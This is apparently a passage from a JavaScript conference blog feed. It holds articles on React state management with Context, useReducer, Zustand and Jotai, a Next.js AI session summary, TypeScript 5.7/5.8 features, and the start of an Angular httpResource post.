The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management with the useReducer hook. This differs from the more commonly used useState hook and does not provide a function for changing the state. Instead, it returns a tuple of readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.
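For example, an action that adds a product to the shopping cart could look like this (the concrete payload shape is illustrative and mirrors the listings below):

const action = {
  type: 'addToCart',
  payload: { id: 1, name: 'Super Mushroom', quantity: 2 },
};

// Handing it to the dispatch function triggers the state transition:
// dispatch(action);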

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer-Hooks

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting though is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot access the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state is still handled by the useCart function. The useAddToCart function returns a new function to which you can pass a new or updated shopping cart item. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the business logic of the application’s state management. Therefore, dedicated state management libraries exist, and Zustand is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of an application’s state. The Zustand API is minimalistic, yet the library has all the features you need to centrally manage the state of your application. Stores are the central element; they are created with the create function, hold the state, and provide methods for modification. In your application’s components, you interact with Zustand’s stores using hook functions. The library lets you perform both synchronous and asynchronous actions and offers the option of persisting the state in the browser’s localStorage or IndexedDB via middleware (a short sketch follows at the end of this section). We don’t have to go that far for the shopping cart implementation in our example. It’s enough to load an existing shopping cart from the server and manage it with the list component. It should be possible to access the state from other components, like CartOverview, which shows a summary of the shopping cart.

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

Zustand’s create function is implemented as a generic function. This means you can pass the state structure to it. TypeScript helps where needed, whether in your development environment or your application’s build process. Pass a callback function to the create function; you can use the get function for read access and the set function for write access to the state. The set function behaves similarly to React’s setState function. You can use the previous state to define a new structure and use it as the return value. The callback function that you pass to create returns an object structure. Then, define the state structure (in our case, this is cartItems) and methods for accessing it like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Working with the state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function, use the cartItems structure to access the data in the store, and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What’s remarkable about Zustand is that you don’t have to worry about integrating a provider. That’s because Zustand doesn’t rely on React’s Context API to manage global state. One disadvantage is that a Zustand store is truly global. So you can’t have two identical stores with different data states in your component hierarchy’s subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.
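To round off the picture, here is a minimal sketch of the persistence middleware mentioned at the beginning of this section; it keeps the cart in the browser’s localStorage, and the store shape and storage key are illustrative:

import { create } from 'zustand';
import { persist } from 'zustand/middleware';
import { CartItem } from './types/Cart';

type PersistedCartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => void;
};

// The curried create<T>()(...) form is needed for correct typing with middleware
export const usePersistedCartStore = create<PersistedCartStore>()(
  persist(
    (set) => ({
      cartItems: [],
      addToCart: (item) =>
        set((state) => ({ cartItems: [...state.cartItems, item] })),
    }),
    { name: 'cart-storage' } // key under which the state is stored in localStorage
  )
);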

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. Individual central state elements and the interfaces to them are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. The connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer-grained structures. The atom is the central element here. In the simplest case, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you can define the type of the atom value via a generic type parameter.
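In its simplest form, this looks as follows; the atom names are illustrative:

import { atom } from 'jotai';

// A primitive atom holding a number, typed via the generic parameter
const quantityAtom = atom<number>(0);

// Atoms can hold objects and arrays as well
const namesAtom = atom<string[]>([]);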

Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you can use the useAtomValue function directly. Write operations go through the derived atoms, for which the useSetAtom function is used. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else, including updating all components affected by the atom change.
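Derived atoms also work for read access. As a minimal sketch, assuming the cartItemsAtom from Listing 9 (totalQuantityAtom is an illustrative name), a read-only atom could compute the total number of items for a component like CartOverview:

import { atom, useAtomValue } from 'jotai';
import { cartItemsAtom } from './cart.atom';

// Recalculated automatically whenever cartItemsAtom changes
const totalQuantityAtom = atom((get) =>
  get(cartItemsAtom).reduce((sum, item) => sum + item.quantity, 0)
);

// Inside a component:
// const total = useAtomValue(totalQuantityAtom);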

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you also must take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. The two libraries take different approaches. Zustand offers a compact solution that concentrates both state structure and logic in a single store. Jotai, on the other hand, works with smaller units and lets you derive or combine these units, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends upon the use case and your personal preferences.

🔍 Frequently Asked Questions (FAQ)

1. What are common reasons for implementing central state management in React?

Central state management is often necessary due to the component-based architecture of single-page applications. It enables efficient data sharing between deeply nested components without passing props through intermediate layers.

2. How does React’s Context API facilitate central state management?

The Context API allows React components to access shared state directly, bypassing the need to pass data through the component tree. This improves reusability and reduces coupling between components.

3. What are typical use cases for central state management in frontend applications?

Use cases include applications involving data record management such as e-commerce carts, address books, fleet management, and smart home systems. These scenarios require consistent, shared data access across multiple components.

4. How can you implement state management using only React without external libraries?

You can use a combination of useState and the Context API to manage and distribute state throughout the component tree. This lightweight method avoids additional dependencies but may require more boilerplate.

5. What are the advantages and limitations of Redux for state management?

Redux offers powerful state control and is suitable for large-scale applications, especially with tools like Redux Toolkit. However, it can introduce unnecessary overhead for smaller projects.

6. How does the useReducer hook enhance state logic separation?

The useReducer hook enables state manipulation through pure functions and action objects, improving code clarity and testability. It also allows the introduction of middleware for handling asynchronous actions.

7. What benefits does Zustand offer over React’s built-in state tools?

Zustand simplifies state logic by consolidating state and actions into centralized stores, avoiding the need for context providers. It supports asynchronous operations and optional local persistence via middleware.

8. How does Jotai manage state differently than Zustand?

Jotai uses atomic state units called atoms and provides fine-grained state control with minimal coupling. It emphasizes modularity and composability, which can lead to cleaner, more scalable code structures.

9. When should you choose Zustand or Jotai over native React state solutions?

Libraries like Zustand and Jotai are ideal when you want to reduce boilerplate, avoid prop drilling, and need a lightweight but scalable alternative to Redux. The choice depends on project complexity and team preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.

Watch the full session below:

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared and then used without ever being assigned a value, the compiler reports an error. In certain situations, however, TypeScript cannot determine this unambiguously. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
 let result: number
 if (myCondition()) {
   result = myCalculation();
 } else {
   const temporaryWork = myOtherCalculation();
    // Forgot to assign 'result'
 }
 printResult();
 function printResult() {
    console.log(result); // no compiler error
 }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

Listing 2: Stricter type check in different functional contexts

function foo() {
 let result: number
 // Further logic in which 'result' is never assigned

 printResult();
 function printResult() {
   console.log(result); 
 // Variable 'result' is used before being assigned.(2454)
 }
}

Another type check ensures that methods with non-literal (or composite, “computed”) property names are consistently treated as index signatures in classes. Listing 3 shows this using a method whose name is a computed symbol property.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
 [sym]() { return 1; }
}
// Is interpreted as
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.
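A minimal sketch of this situation, assuming “noImplicitAny” is enabled (the fetchData function is illustrative):

declare function fetchData(): Promise<string>;

// The handler lacks a return-type annotation and returns null
const result = fetchData().catch(() => null);
// TS7011: Function expression, which lacks return-type annotation,
// implicitly has an 'any' return type.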

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript version 2024 can now be used as the compile target (e.g., via the compiler flag --target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (“restock”). The function “Object.groupBy()” is passed the array to be grouped and a function that returns which group each item in the array belongs to. The return value of the groupBy function is an object (here the variable “result”) that contains the different groups as properties. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Grouping arrays with Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. The length of ArrayBuffers can be changed in ES2024 (‘resize()’), while SharedArrayBuffers can ‘only’ grow (‘grow()’). Therefore, both buffer variants obviously have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype ‘ArrayBufferLike’ is used. If a specific implementation is to be used, the buffer type used can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer types. Listing 5 illustrates this, showing that in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays with a generic buffer type

// New: TypedArray with a generic ArrayBuffer type
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Usage with a concrete type:
// here: SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` exists only on SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries that enable TypeScript files to be executed directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “--experimental-strip-types”). Direct execution of TypeScript can speed up development processes, for example, by skipping the build/compile task between development and execution and “catching up” later. This becomes possible when relative imports are adjusted: Normally, imports do not have a file extension (see Listing 6), so that the imports do not have to differ between the source code and the compiled result. However, executing the file directly without translation requires the “.ts” extension (Listing 6). Such an import usually results in a compiler error. With the new compiler option “--rewriteRelativeImportExtensions,” all TypeScript extensions are automatically rewritten (from .ts, .tsx, .mts, and .cts to .js, .jsx, .mjs, and .cjs). On the one hand, this provides better support for direct execution. On the other hand, it is also possible to use and compile the TypeScript files in the normal TypeScript build process, which is important, for example, for authors of libraries who want to test their files quickly without a compile step, but also need the real TypeScript build before publishing the library.

Listing 6: Import with .ts extension

import {Demo} from './bar'; // <- standard import
import {Demo} from './bar.ts'; // <- required for direct execution

If the Node.js option “--experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy for Node.js to remove (strip) are used. To better support this use case, the new compiler option “--erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “--erasableSyntaxOnly”

// error: namespace with runtime code
namespace container {
}

class Point {
 // error: implicit properties / parameter properties
 constructor(public x: number, public y: number) { }
}

// error: enum declaration
enum Direction {
 Up,
 Down
}

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it also takes advantage of all the new options available under the hood. In Node.js 22, for example, a caching API (“module.enableCompileCache()”) was introduced, which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compilation with tsc was about two to three times faster than before.
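The same API can also be enabled for your own Node.js-based tools; a minimal sketch, assuming Node.js 22.8 or later:

import { enableCompileCache } from 'node:module';

// Caches compiled bytecode on disk and reuses it across process runs
enableCompileCache();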

By default, the compiler checks whether special “@typescript/lib-*” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. The check for such library packages was always performed previously, even if no library packages were used. This can mean unnecessary overhead for many files or in large projects. With the new compiler option “--libReplacement=false,” this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the directory tree is now searched further up if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript compiler is to be completely rewritten in Go for version 7. Initial tests have shown that the new compiler written in Go can achieve up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the --experimental-strip-types flag. New compiler options like --rewriteRelativeImportExtensions and --erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the --erasableSyntaxOnly compiler option do?
The --erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworld, underground, underwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Figure 1: Level 1 in overworld style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient under the hood enables the use of interceptors

